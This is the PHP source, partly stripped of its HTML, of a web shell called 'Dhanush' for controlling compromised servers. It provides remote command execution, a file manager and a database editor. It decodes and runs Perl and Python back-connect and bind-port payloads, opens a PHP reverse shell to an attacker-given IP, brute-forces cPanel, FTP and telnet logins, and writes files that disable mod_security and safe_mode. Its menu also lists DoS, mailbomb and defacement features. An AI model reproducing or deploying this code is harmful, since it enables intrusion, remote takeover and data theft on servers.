\r\n\r\n"; + + $count = 0; + while ($row = mysql_fetch_assoc($result)) + { + echo "\r\n"; + + if ($count==0) // list column names + { + echo "\r\n"; + while($key = key($row)) + { + echo "\r\n"; + next($row); + } + echo "\r\n"; + } + + foreach($row as $r) // list content of column names + { + if ($r=='') $r = 'NULL'; + echo "\r\n"; + } + echo "\r\n"; + $count++; + } + echo "
" . $key . "
" . $r . "
\n\r" . $count . " rows returned.\r\n"; + echo ""; + } + + // View Table Data + if($_GET['action'] == "viewdata") + { + global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data; + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + echo "
"; + ?> +

+
+ + + + + + + +
+
+ Data in Table
"; + if( $tablename != "" ) + echo "$dbname > $tablename
"; + else + echo "$dbname
"; + + $queryStr = ""; + $pag = 0; + $queryStr = stripslashes( $queryStr ); + if( $queryStr == "" ) + { + if(isset($_REQUEST['page'])) + { + $res = mysql_query("select * from $tablename"); + $getres = mysql_num_rows($res); + $coun = ceil($getres/30); + if($_REQUEST['page'] != 1) + + $pag = $_REQUEST['page'] * 30; + else + $pag = $_REQUEST['page'] * 30; + + $queryStr = "SELECT * FROM $tablename LIMIT $pag,30"; + $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30"); + $arrcount = 1; + $arrdata[$arrcount] = 0; + while($row = mysql_fetch_array($sql)) + { + $arrdata[$arrcount] = $row[$rowid]; + $arrcount++; + } + } + else + { + $queryStr = "SELECT * FROM $tablename LIMIT 0,30"; + $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30"); + $arrcount = 1; + $arrdata[$arrcount] = 0; + while($row = mysql_fetch_array($sql)) + { + $arrdata[$arrcount] = $row[$rowid]; + $arrcount++; + } + } + if( $orderby != "" ) + $queryStr .= " ORDER BY $orderby"; + echo "Schema\n"; + } + + + $pResult = mysql_query($queryStr ); + $fieldt = mysql_fetch_field($pResult); + $tablename = $fieldt->table; + $errMsg = mysql_error(); + + $GLOBALS[queryStr] = $queryStr; + + if( $pResult == false ) + { + echoQueryResult(); + return; + } + if( $pResult == 1 ) + { + $errMsg = "Success"; + echoQueryResult(); + return; + } + + echo "
\n"; + + $row = mysql_num_rows( $pResult ); + $col = mysql_num_fields( $pResult ); + + if( $row == 0 ) + { + echo "No Data Exist!"; + return; + } + + if( $rowperpage == "" ) $rowperpage = 30; + if( $page == "" ) $page = 0; + else $page--; + mysql_data_seek( $pResult, $page * $rowperpage ); + + echo "\n"; + echo "\n"; + for( $i = 0; $i < $col; $i++ ) + { + $field = mysql_fetch_field( $pResult, $i ); + echo "\n"; + } + echo "\n"; + echo "\n"; + $num=1; + + + $acount = 1; + + for( $i = 0; $i < $rowperpage; $i++ ) + { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + echo "\n"; + $key = ""; + for( $j = 0; $j < $col; $j++ ) + { + $data = $rowArray[$j]; + + $field = mysql_fetch_field( $pResult, $j ); + if( $field->primary_key == 1 ) + $key .= "&" . $field->name . "=" . $data; + + if( strlen( $data ) > 30 ) + $data = substr( $data, 0, 30 ) . "..."; + $data = htmlspecialchars( $data ); + echo "\n"; + } + + if(!is_numeric($arrdata[$acount])) + echo "\n"; + else + { + echo "\n"; + echo "\n"; + $acount++; + } + } + echo "\n"; + + + echo "
"; + if($action == "viewdata") + echo "".$field->name."\n"; + else + echo $field->name."\n"; + echo "Action
\n"; + echo "$data\n"; + echo "No KeyEditDelete
"; + if($arrcount > 30) + { + $res = mysql_query("select * from $tablename"); + $getres = mysql_num_rows($res); + $coun = ceil($getres/30); + echo "
"; + echo "
"; + } + } + + // Delete Table Data + if($_GET['action'] == "deleteData") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');"); + $row = mysql_fetch_array($sql); + $row = $row['COLUMN_NAME']; + $rowid = $_GET[$row]; + mysql_query("delete from $tablename where $row = '$rowid'"); + listtable(); + } + // Edit Table Data + if($_GET['action'] == "editData") + { + global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data; + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + echo "
"; + ?> +

+
+ primary_key == 1 ) + if( $field->numeric == 1 ) + $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; + else + $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND "; + } + $key = substr( $key, 0, strlen($key)-4 ); + + mysql_select_db( $dbname, $mysqlHandle ); + $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle ); + $data = mysql_fetch_array( $pResult ); + + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + + $pResultLen = mysql_list_fields( $dbname, $tablename ); + $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',"; + $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',"; + for( $i = 0; $i < $num; $i++ ) + { + $field = mysql_fetch_array( $pResult ); + $fieldname = $field["Field"]; + $fieldtype = $field["Type"]; + $len = mysql_field_len( $pResultLen, $i ); + + echo ""; + echo ""; + echo ""; + echo "\n"; + $value = htmlspecialchars($data[$i]); + $type = strtok( $fieldtype, " (,)\n" ); + if( $type == "enum" || $type == "set" ) + { + echo "\n"; + } + else + { + if( $len < 40 ) + echo "\n"; + else + echo ""; + } + $fundata1=eregi_replace(',$', '', $fundata1); + $fundata2=eregi_replace(',$', '', $fundata2); + + echo "
NameTypeFunctionData
$fieldname".$field["Type"]."\n"; + echo "\n"; + echo "\n"; + if( $type == "enum" ) + echo "\n"; + while( $str = strtok( "'" ) ) + { + if( $value == $str ) + echo "\n"; + } + $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,"; + $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,"; + echo "

\n"; + echo "\n"; + echo "\n"; + echo "

\n"; + } + } +// Edit Submit Table Data +else if($_REQUEST['action'] == "editsubmitData") +{ + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_POST['dbname']; + $tablename = $_POST['tablename']; + + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + + $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');"); + $row = mysql_fetch_array($sql); + $row = $row['COLUMN_NAME']; + $rowid = $_POST[$row]; + + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + + $rowcount = $num; + + $pResultLen = mysql_list_fields( $dbname, $tablename ); + + for( $i = 0; $i < $num; $i++ ) + { + $field = mysql_fetch_array( $pResult ); + $fieldname = $field["Field"]; + $arrdata = $_REQUEST[$fieldname]; + + $str .= " " . $fieldname . " = '" . $arrdata . "'"; + $rowcount--; + if($rowcount != 0) + $str .= ","; + } + + $str = "update $tablename set" . $str . " where $row=$rowid"; + mysql_query($str); + ?>
File $v Deleted Successfully
"; + else + echo "
Cannot Delete File $v
"; + } + else if(is_dir($v)) + { + rrmdir($v); + } + } + } + else if($_POST['choice'] == "chmod") + { ?> +
+ + + + + + + + + +
Change Permissions
+
+ +
=0;--$i) + $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1)); + echo "
"; + if(@chmod($v,$perms)) + echo "File $v Permissions Changed Successfully
"; + else + echo "Cannot Change $v File Permissions
"; + echo "
"; + } + } + + } + } + else if($_POST['choice'] == "compre") + { + $actbox = $_POST["actbox"]; + foreach ($actbox as $myv) + $myv = explode(",",$myv); + foreach ($myv as $v) + { + if(is_file($v)) + { + $zip = new ZipArchive(); + $filename= basename($v) . '.zip'; + if(($zip->open($filename, ZipArchive::CREATE))!==true) + { echo '
Error: Unable to create zip file for $v';} + else {echo "
File $v Compressed successfully";} + $zip->addFile(basename($v)); + $zip->close(); + } + else if(is_dir($v)) + { + if($os == "Linux") + { + $filename= basename($v); + execmd("tar --create --recursion --file=$filename.tar $v"); + echo "
File $v Compressed successfully as $v.tar"; + } + } + } + } + else if($_POST['choice'] == "uncompre") + { + $actbox = $_POST["actbox"]; + foreach ($actbox as $myv) + $myv = explode(",",$myv); + foreach ($myv as $v) + { + if(is_file($v) || is_dir($v)) + { + $zip = new ZipArchive; + $filename= basename($v); + $res = $zip->open($filename); + if ($res === TRUE) + { + $pieces = explode(".",$filename); + $zip->extractTo($pieces[0]); + $zip->close(); + echo "
File $v Unzipped successfully"; + } else + echo "
Error: Unable to Unzip file $v"; + } + } + } +} +else if(isset($_GET['sitename'])) +{ + $sitename = str_replace("http://","",$_GET['sitename']); + $sitename = str_replace("http://www.","",$sitename); + $sitename = str_replace("www.","",$sitename); + $show = myexe("ls -la /etc/valiases/".$sitename); + if(!empty($show)) + echo $show; + else + echo "Cannot get the username"; +} +else if(isset($_GET['mydata'])) +{ + listdatabase(); +} +else if(isset($_GET['home'])) +{ + mainfun($_GET['home']); +} +else if(isset($_GET['dir'])) +{ + mainfun($_GET['myfilepath']); +} +else if(isset($_GET['mydirpath'])) +{ + echo is_writable($_GET['mydirpath'])?"< writable >":"< not writable >"; +} +else +{ +?> + +Dhanush : By Arjun + + + + +
+ + + + + + + + + + 2) + { + flush(); + $count++; + } + } + } + ?> 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") + continue; + $count++; + } + ?> + + + + + + + + + + + + + + + + +
System Info : Server Port : Software Info
Uid : Websites : Websites :
Disk Space : Free Space : Server IP : Your IP :
View Directories : Current Directory : + ".htmlspecialchars($b).$directorysperator.''; + $i++; + } + + ?> + [Home]Disable functions : Safe Mode : Download It
+ +'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect'); + $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about'); + echo " + "; + $menu = ''; + + foreach($m1 as $k => $v) + $menu .= ""; + echo $menu; + echo " +
[".$k."]
+ + + "; + foreach($m2 as $k => $v) + $menu1 .= ""; + echo $menu1; + echo " + + +
[".$k."][SelfKill][LogOut]
";?> + +
+ + SecFilterEngine Off + SecFilterScanPOST Off + \n\r"); + + $file_pointer = fopen("ini.php", "w+"); + fwrite($file_pointer, ""); + + $file_pointer = fopen("php.ini", "w+"); + fwrite($file_pointer, "safe_mode = Off"); + + fclose($file_pointer); + + } + + else if(isset($_POST['cpanelattack'])) + { + if(!empty($_POST['username']) && !empty($_POST['password'])) + { + $userlist=explode("\n",$_POST['username']); + $passlist=explode("\n",$_POST['password']); + + if($_POST['cracktype'] == "ftp") + { + foreach ($userlist as $user) + { + $pureuser = trim($user); + foreach ($passlist as $password ) + { + $purepass = trim($password); + ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + } + } + } + if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") + { + if($cracktype == "telnet") + $cpanel_port="23"; + else + $cpanel_port="2082"; + foreach ($userlist as $user) + { + $pureuser = trim($user); + + echo " [ - ] + Processing user $pureuser ...

"; + + foreach ($passlist as $password ) + { + $purepass = trim($password); + cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + + } + } + } + } + else + $bdmessage = "
Enter Username & Password List
"; + } + +else if(isset($_GET['info'])) +{ + $bdmessage = "
".nl2br(shell_exec("whois ".$_GET['info']))."
"; +} +else if(isset($_POST['u'])) +{ + $path = $_REQUEST['path']; + if(is_dir($path)) + { + $setuploadvalue = 0; + $uploadedFilePath = $_FILES['uploadfile']['name']; + $tempName = $_FILES['uploadfile']['tmp_name']; + if($os == "Windows") + $uploadPath = $path . $directorysperator . $uploadedFilePath; + else if($os == "Linux") + $uploadPath = $path . $directorysperator . $uploadedFilePath; + if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath)) + $bdmessage = "File uploaded to $uploadPath"; + else + $bdmessage = "Failed to upload file to $uploadPath"; + } + ?>$out\n".execmd("ps aux | grep bp.pl").""; + } + else + { + @$fh=fopen("/tmp/bp.pl","w"); + @fwrite($fh,gzinflate(base64_decode($bind_port_p))); + @fclose($fh); + execmd("chmod 0755 ".getcwd()."/bp.pl"); + execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &"); + $bdmessage = "
$out\n".execmd("ps aux | grep bp.pl")."
"; + } + } + } +} +else if(isset($_POST['backconnect'])) +{ + if($_POST['ip'] != "" && $_POST['port'] != "") + { ?>Trying to connect...
"; + execmd("perl ".getcwd()."/bc.pl $host $port &",$disable); + if(!@unlink(getcwd()."/bc.pl")) echo "Warning: Failed to delete reverse-connection program
"; + } + else + { + @$fh=fopen("/tmp/bc.pl","w"); + @fwrite($fh,gzuncompress(base64_decode($backconnect_perl))); + @fclose($fh); + $bdmessage = "Trying to connect..."; + execmd("perl /tmp/bc.pl $host $port &",$disable); + if(!@unlink("/tmp/bc.pl")) + echo "

Warning: Failed to delete reverse-connection program


"; + } + } + else if($_POST["lang"] == "python") + { + if(is_writable(".")) + { + $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error()); + if($w_file) + { + @fputs($w_file,gzuncompress(base64_decode($back_connect_p))); + @fclose($w_file); + chmod(getcwd().'/bc.py', 0777); + } + execmd("python ".getcwd()."/bc.py $host $port &",$disable); + $bdmessage = "Trying to connect..."; + + if(!@unlink(getcwd()."/bc.py")) + echo "

Warning: Failed to delete reverse-connection program


"; + } + else + { + $w_file=@fopen("/tmp/bc.py","w"); + if($w_file) + { + @fputs($w_file,gzuncompress(base64_decode($back_connect_p))); + @fclose($w_file); + chmod('/tmp/bc.py', 0777); + } + execmd("python /tmp/bc.py $host $port &",$disable); + $bdmessage = "Trying to connect..."; + if(!@unlink("/tmp/bc.py")) + echo "

Warning: Failed to delete reverse-connection program


"; + } + } + else if($_POST["lang"] == "php") + { + $bdmessage = "Trying to connect..."; + $ip = $_POST['ip']; + $port=$_POST['port']; + $sockfd=fsockopen($ip , $port , $errno, $errstr ); + if($errno != 0) + { + $bdmessage = "$errno : $errstr"; + } + else if (!$sockfd) + { + $result = "

Fatal : An unexpected error was occured when trying to connect!

"; + } + else + { + fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n================================================================="); + $pwd = exec_all("pwd"); + $sysinfo = exec_all("uname -a"); + $id = exec_all("id"); + $len = 1337; + fputs($sockfd ,$sysinfo . "\n" ); + fputs($sockfd ,$pwd . "\n" ); + fputs($sockfd ,$id ."\n\n" ); + fputs($sockfd ,$dateAndTime."\n\n" ); + while(!feof($sockfd)) + { + $cmdPrompt ="(dhanush)[$]> "; + fputs ($sockfd , $cmdPrompt ); + $command= fgets($sockfd, $len); + fputs($sockfd , "\n" . exec_all($command) . "\n\n"); + } + fclose($sockfd); + } + } + } +} +else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2'])) +{ + $temp = ""; + for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++) + { + $uid = @posix_getpwuid($_GET['val1']); + if ($uid) + $temp .= join(':',$uid)."\n"; + } + echo '
'; + paramexe('Users', $temp); +} +else if(isset($_GET['download'])) +{ + download(); +} +else +{ + ?>< writable >
":"< not writable >"; +?> +

+ + + + + + + + + + + +
+
+Upload file :
+  +
+ +
+
Create File : +
+ + +
+ +
Execute :
+ + +
Create Directory :
+ + +
Get Exploit 
+ +

+ + +
+
+
+Some Commands
+ + + + + + + +
+

+ + + + + + + + +
+
+धनुष
+--==Coded By Arjun==--

जय हिन्द
+ +
+
+
+ + + + + + + + + + + + + + + + + + + + + +
Dhanush
User Name :
Password :
--==Coded By Arjun==--
+
+ +
+
+
+ + +